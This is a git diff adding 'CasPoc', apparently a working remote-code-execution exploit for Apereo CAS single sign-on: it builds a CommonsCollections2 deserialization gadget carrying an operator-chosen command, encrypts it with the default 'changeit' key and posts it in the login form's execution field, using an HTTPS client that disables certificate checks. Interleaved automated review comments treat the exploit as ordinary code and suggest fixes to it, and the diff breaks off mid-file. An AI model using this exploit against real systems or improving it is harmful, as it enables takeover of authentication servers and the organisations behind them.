diff --git a/.idea/$CACHE_FILE$ b/.idea/$CACHE_FILE$
new file mode 100644
index 0000000..ea76935
--- /dev/null
+++ b/.idea/$CACHE_FILE$
@@ -0,0 +1,47 @@
+
+
+
+
+
+
+
+
+ Android
+
+
+ CDI (Contexts and Dependency Injection)
+
+
+ CodeSpring CoreSpring
+
+
+ EncapsulationJava
+
+
+ Java
+
+
+ LintAndroid
+
+
+ SecurityLintAndroid
+
+
+ Spring
+
+
+ Spring AOPSpring
+
+
+ Spring CoreSpring
+
+
+
+
+ Android
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/compiler.xml b/.idea/compiler.xml
new file mode 100644
index 0000000..bab543e
--- /dev/null
+++ b/.idea/compiler.xml
@@ -0,0 +1,13 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/encodings.xml b/.idea/encodings.xml
new file mode 100644
index 0000000..aa00ffa
--- /dev/null
+++ b/.idea/encodings.xml
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/jarRepositories.xml b/.idea/jarRepositories.xml
new file mode 100644
index 0000000..abb532a
--- /dev/null
+++ b/.idea/jarRepositories.xml
@@ -0,0 +1,20 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 0000000..3736354
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,18 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
new file mode 100644
index 0000000..aca4e3c
--- /dev/null
+++ b/.idea/workspace.xml
@@ -0,0 +1,217 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1596180457747
+
+
+ 1596180457747
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ jar://$PROJECT_DIR$/cas-0.0.1-all.jar!/maoge/cas/AESBase64.class
+ 64
+
+
+
+ file://$PROJECT_DIR$/src/main/java/org/unicodesec/poc.java
+ 80
+
+
+
+ file://$PROJECT_DIR$/src/main/java/org/unicodesec/EncryptedTranscoder.java
+ 62
+
+
+
+ file://$PROJECT_DIR$/src/main/java/org/unicodesec/EncryptedTranscoder.java
+ 104
+
+
+
+ jar://$MAVEN_REPOSITORY$/org/cryptacular/cryptacular/1.0/cryptacular-1.0.jar!/org/cryptacular/bean/AbstractCipherBean.class
+ 61
+
+
+
+
+
+
\ No newline at end of file
diff --git a/CasPoc.iml b/CasPoc.iml
new file mode 100644
index 0000000..78b2cc5
--- /dev/null
+++ b/CasPoc.iml
@@ -0,0 +1,2 @@
+
+
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
new file mode 100644
index 0000000..8a4bf48
--- /dev/null
+++ b/pom.xml
@@ -0,0 +1,106 @@
+
+
+
+ 4.0.0
+
+ org.unicodesec
+ CasPoc
+ 1.0-SNAPSHOT
+
+ CasPoc
+
+ http://www.example.com
+
+
+ UTF-8
+ 1.7
+ 1.7
+
+
+
+
+ org.javassist
+ javassist
+ 3.24.0-GA
+
+
+ org.springframework.webflow
+ spring-webflow
+ 2.4.1.RELEASE
+
+
+ org.apache.httpcomponents
+ httpclient
+ 4.5.9
+
+
+ org.apache.commons
+ commons-collections4
+ 4.0
+
+
+ org.cryptacular
+ cryptacular
+ 1.0
+
+
+
+ commons-io
+ commons-io
+ 2.6
+
+
+ org.jasig
+ spring-webflow-client-repo
+ 1.0.0
+
+
+ org.reflections
+ reflections
+ 0.9.10
+
+
+ com.nqzero
+ permit-reflect
+ 0.3
+
+
+ org.ow2.asm
+ asm-all
+ 5.1
+
+
+
+
+
+
+ org.apache.maven.plugins
+ maven-assembly-plugin
+ 2.4.1
+
+
+
+ jar-with-dependencies
+
+
+
+
+ org.unicodesec.poc
+
+
+
+
+
+ make-assembly
+
+ package
+
+ single
+
+
+
+
+
+
+
diff --git a/readme.md b/readme.md
new file mode 100644
index 0000000..9e5faf1
--- /dev/null
+++ b/readme.md
@@ -0,0 +1,10 @@
+## 简介
+Apereo CAS 是一个开源的企业级单点登录系统,很多统一认证系统都是基于此系统二次开发
+
+1. 支持自定义命令
+
+## 效果
+
+
+感谢 https://github.com/langligelang/CAS_EXP/tree/master/
+代码略作修改,使用asm自定义命令
\ No newline at end of file
diff --git a/src/logback.xml b/src/logback.xml
new file mode 100644
index 0000000..445c40c
--- /dev/null
+++ b/src/logback.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/src/main/java/org/unicodesec/EncryptedTranscoder.java b/src/main/java/org/unicodesec/EncryptedTranscoder.java
new file mode 100644
index 0000000..1b2b1ca
--- /dev/null
+++ b/src/main/java/org/unicodesec/EncryptedTranscoder.java
@@ -0,0 +1,107 @@
+package org.unicodesec;
+
+import org.cryptacular.bean.BufferedBlockCipherBean;
+import org.cryptacular.bean.CipherBean;
+import org.cryptacular.bean.KeyStoreFactoryBean;
+import org.cryptacular.generator.sp80038a.RBGNonce;
+import org.cryptacular.io.URLResource;
+import org.cryptacular.spec.BufferedBlockCipherSpec;
+import org.jasig.spring.webflow.plugin.Transcoder;
+import payloads.Serializer;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.net.URL;
+import java.security.KeyStore;
+import java.util.zip.GZIPInputStream;
+import java.util.zip.GZIPOutputStream;
+
+public class EncryptedTranscoder implements Transcoder {
+ private CipherBean cipherBean;
+ private boolean compression = true;
+
+ public EncryptedTranscoder() {
+ BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
+ bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
+ bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
+ bufferedBlockCipherBean.setKeyAlias("aes128");
+ bufferedBlockCipherBean.setKeyPassword("changeit");
+ bufferedBlockCipherBean.setNonce(new RBGNonce());
+ this.setCipherBean(bufferedBlockCipherBean);
+ }
+
+ public EncryptedTranscoder(CipherBean cipherBean) throws IOException {
+ this.setCipherBean(cipherBean);
+ }
+
+ public void setCompression(boolean compression) {
+ this.compression = compression;
+ }
+
+ protected void setCipherBean(CipherBean cipherBean) {
+ this.cipherBean = cipherBean;
+ }
+
+ public byte[] encode(Object o) throws IOException {
+ if (o == null) {
+ return new byte[0];
+ }
+
+ byte[] out = null;
+
+ if (this.compression) {
+ ByteArrayOutputStream byteout = new ByteArrayOutputStream();
+ GZIPOutputStream gzip = new GZIPOutputStream(byteout);
+ gzip.write(Serializer.serialize(o));
+ gzip.close();
+ out = byteout.toByteArray();
+ } else {
+ out = Serializer.serialize(o);
+ }
+ return this.cipherBean.encrypt(out);
+
+ }
+
+ public Object decode(byte[] encoded) throws IOException {
+ byte[] data;
+ try {
+ data = this.cipherBean.decrypt(encoded);
+ } catch (Exception var11) {
+ throw new IOException("Decryption error", var11);
+ }
+
+ ByteArrayInputStream inBuffer = new ByteArrayInputStream(data);
+ ObjectInputStream in = null;
+
+ Object var5;
+ try {
+ if (this.compression) {
+ in = new ObjectInputStream(new GZIPInputStream(inBuffer));
+ } else {
+ in = new ObjectInputStream(inBuffer);
+ }
+
+ var5 = in.readObject();
+ } catch (ClassNotFoundException var10) {
+ throw new IOException("Deserialization error", var10);
+ } finally {
+ if (in != null) {
+ in.close();
+ }
+
+ }
+
+ return var5;
+ }
+
+ protected KeyStore createAndPrepareKeyStore() {
+ KeyStoreFactoryBean ksFactory = new KeyStoreFactoryBean();
+ URL u = this.getClass().getResource("/etc/keystore.jceks");
+ ksFactory.setResource(new URLResource(u));
+ ksFactory.setType("JCEKS");
+ ksFactory.setPassword("changeit");
+ return ksFactory.newInstance();
+ }
+}
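Review bot: `decode` feeds the decrypted bytes to an unfiltered `ObjectInputStream` and returns whatever `readObject` yields, so the cipher is the only control over which classes get instantiated, and that cipher is keyed from literals (`setKeyAlias("aes128")`, `setKeyPassword("changeit")`, and the same password again in `createAndPrepareKeyStore`) rather than from injected configuration. Where this transcoder sits on the receiving side, the stream should be restricted before `readObject` (on Java 9+ `in.setObjectInputFilter(...)` with an allow-list of the expected state classes) and the key material should be loaded from configuration; the `1.7` entries in this commit's pom.xml look like the compiler source/target, so the filter API would need a raised build level. `createAndPrepareKeyStore` also passes the result of `getResource("/etc/keystore.jceks")` straight into `new URLResource(u)`, so a missing resource surfaces as a `NullPointerException` inside cryptacular; an explicit check `if (u == null) throw new IllegalStateException("keystore resource /etc/keystore.jceks not found on classpath");` would name the real problem. The `catch (Exception var11)` around `decrypt` and the `throws IOException` on the `CipherBean` constructor (which cannot throw it) are decompiler leftovers worth tidying.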
diff --git a/src/main/java/org/unicodesec/SSLClient.java b/src/main/java/org/unicodesec/SSLClient.java
new file mode 100644
index 0000000..e187e9e
--- /dev/null
+++ b/src/main/java/org/unicodesec/SSLClient.java
@@ -0,0 +1,36 @@
+package org.unicodesec;
+
+import java.security.SecureRandom;
+import java.security.cert.CertificateException;
+import java.security.cert.X509Certificate;
+import javax.net.ssl.KeyManager;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
+import org.apache.http.conn.ClientConnectionManager;
+import org.apache.http.conn.scheme.Scheme;
+import org.apache.http.conn.scheme.SchemeRegistry;
+import org.apache.http.conn.ssl.SSLSocketFactory;
+import org.apache.http.impl.client.DefaultHttpClient;
+
+public class SSLClient extends DefaultHttpClient {
+ public SSLClient() throws Exception {
+ SSLContext ctx = SSLContext.getInstance("TLS");
+ X509TrustManager tm = new X509TrustManager() {
+ public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
+ }
+
+ public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
+ }
+
+ public X509Certificate[] getAcceptedIssuers() {
+ return null;
+ }
+ };
+ ctx.init((KeyManager[])null, new TrustManager[]{tm}, (SecureRandom)null);
+ ClientConnectionManager ccm = this.getConnectionManager();
+ SchemeRegistry sr = ccm.getSchemeRegistry();
+ SSLSocketFactory ssf = new SSLSocketFactory(ctx, SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
+ sr.register(new Scheme("https", 443, ssf));
+ }
+}
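Review bot: The anonymous `X509TrustManager` accepts every chain and `ALLOW_ALL_HOSTNAME_VERIFIER` skips host matching, so every `https` request made through `SSLClient` can be intercepted by anyone on the path; if a lab client really needs this it should be an explicit opt-in (constructor flag or system property) documented with a comment such as `// certificate and hostname verification are disabled; only use against a trusted lab endpoint`, not the unconditional behaviour of the class. `getAcceptedIssuers` should return `new X509Certificate[0]` rather than `null` — the `X509TrustManager` contract allows an empty array but not null, and some `SSLContext` implementations dereference it. `DefaultHttpClient`, `SSLSocketFactory` and `SchemeRegistry` are deprecated in the httpclient 4.5 line the pom pulls in; `HttpClients.custom().setSSLSocketFactory(...)` is the supported way to install a custom context.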
diff --git a/src/main/java/org/unicodesec/poc.java b/src/main/java/org/unicodesec/poc.java
new file mode 100644
index 0000000..78da15d
--- /dev/null
+++ b/src/main/java/org/unicodesec/poc.java
@@ -0,0 +1,85 @@
+package org.unicodesec;
+
+
+import org.apache.commons.io.IOUtils;
+import org.apache.http.HttpVersion;
+import org.apache.http.NameValuePair;
+import org.apache.http.client.entity.UrlEncodedFormEntity;
+import org.apache.http.client.methods.CloseableHttpResponse;
+import org.apache.http.client.methods.HttpPost;
+import org.apache.http.impl.client.CloseableHttpClient;
+import org.apache.http.impl.client.HttpClients;
+import org.apache.http.message.BasicNameValuePair;
+import org.apache.log4j.BasicConfigurator;
+import org.apache.log4j.Level;
+import org.apache.log4j.Logger;
+import org.apache.log4j.PropertyConfigurator;
+import sun.misc.BASE64Encoder;
+
+import java.nio.charset.Charset;
+import java.util.*;
+import java.util.Map.Entry;
+
+public class poc {
+
+ public poc() {
+ }
+
+ public static void main(String[] args) throws Exception {
+ String text = " _____ ______ \n" +
+ " / ____| | ____| \n" +
+ " | | __ _ ___ | |__ __ __ _ __ \n" +
+ " | | / _` | / __| | __| \\ \\/ / | '_ \\ \n" +
+ " | |____ | (_| | \\__ \\ | |____ > < | |_) |\n" +
+ " \\_____| \\__,_| |___/ |______| /_/\\_\\ | .__/ \n" +
+ " | | \n" +
+ " |_| \n" +
+ " Powered by UnicodeSec \n";
+ System.out.println(text);
+ if (args.length < 2) {
+ System.out.println("java -jar cas-[version]-all.jar [url] [cmd]");
+ } else {
+ String url = args[0].trim();
+ String cmd = args[1].trim();
+ BASE64Encoder encoder = new BASE64Encoder();
+ Object payloadObject = payloads.gadgets.CommonsCollections2.class.newInstance().getObject(cmd);
+ EncryptedTranscoder et = new EncryptedTranscoder();
+ byte[] encode = et.encode(payloadObject);
+ String payload = encoder.encode(encode);
+ System.out.println(String.format("executing command %s", cmd));
+ Map map = new HashMap();
+ map.put("username", "13222233322");
+ map.put("password", "Test1234");
+ map.put("lt", "LT-215706-O4ejY5ldDQpHMB9WdQbe0trNaM28Wf-cas01.example.org");
+ map.put("execution", "7b951c2a-e78f-4286-95fe-970782352a84_" + payload);
+ map.put("_eventId", "submit");
+ String result = "result:\n\t";
+ System.out.println(result + doPost(url, map, url.startsWith("https")));
+ }
+ }
+
+ public static String doPost(String apiUrl, Map params, boolean isSSL) throws Exception {
+ CloseableHttpClient httpClient = HttpClients.createDefault();
+ HttpPost httpPost = new HttpPost(apiUrl);
+
+ List pairList = new ArrayList(params.size());
+ Iterator var7 = params.entrySet().iterator();
+
+ while (var7.hasNext()) {
+ Entry entry = (Entry) var7.next();
+ NameValuePair pair = new BasicNameValuePair(entry.getKey(), entry.getValue().toString());
+ pairList.add(pair);
+ }
+ httpPost.setEntity(new UrlEncodedFormEntity(pairList, Charset.forName("UTF-8")));
+ httpPost.setProtocolVersion(HttpVersion.HTTP_1_0);
+ CloseableHttpResponse response;
+ if (isSSL) {
+ httpClient = new SSLClient();
+ }
+ response = httpClient.execute(httpPost);
+
+ return IOUtils.toString(response.getEntity().getContent(), "utf-8");
+
+ }
+
+}
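Review bot: `doPost` leaks its HTTP resources: `HttpClients.createDefault()` is opened on the first line and then discarded when `isSSL` replaces it with `new SSLClient()`, and neither the surviving client nor the `CloseableHttpResponse` is ever closed. Choosing the client once, before the request, and holding both in try-with-resources (available at the 1.7 level the pom appears to target) fixes both leaks. `sun.misc.BASE64Encoder` in `main` is a JDK-internal class that is not present on Java 9+ (`java.util.Base64` is the public API since 8). The raw `Map`/`List`/`Entry` types make `entry.getKey()` an `Object`, which does not match `BasicNameValuePair(String, String)` — if the generics were stripped when this page was rendered, ignore this; otherwise declare the parameter as `Map<String, String> params` and iterate with a typed for-each.

```java
public static String doPost(String apiUrl, Map params, boolean isSSL) throws Exception {
    HttpPost httpPost = new HttpPost(apiUrl);
    // … unchanged: building pairList, setEntity, setProtocolVersion …
    // pick the client once so the default client is never created and abandoned
    try (CloseableHttpClient httpClient = isSSL ? new SSLClient() : HttpClients.createDefault();
         CloseableHttpResponse response = httpClient.execute(httpPost)) {
        return IOUtils.toString(response.getEntity().getContent(), "utf-8");
    }
}
```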
diff --git a/src/main/java/payloads/Deserializer.java b/src/main/java/payloads/Deserializer.java
new file mode 100644
index 0000000..ec67639
--- /dev/null
+++ b/src/main/java/payloads/Deserializer.java
@@ -0,0 +1,29 @@
+package payloads;
+
+import java.io.*;
+import java.util.concurrent.Callable;
+
+public class Deserializer implements Callable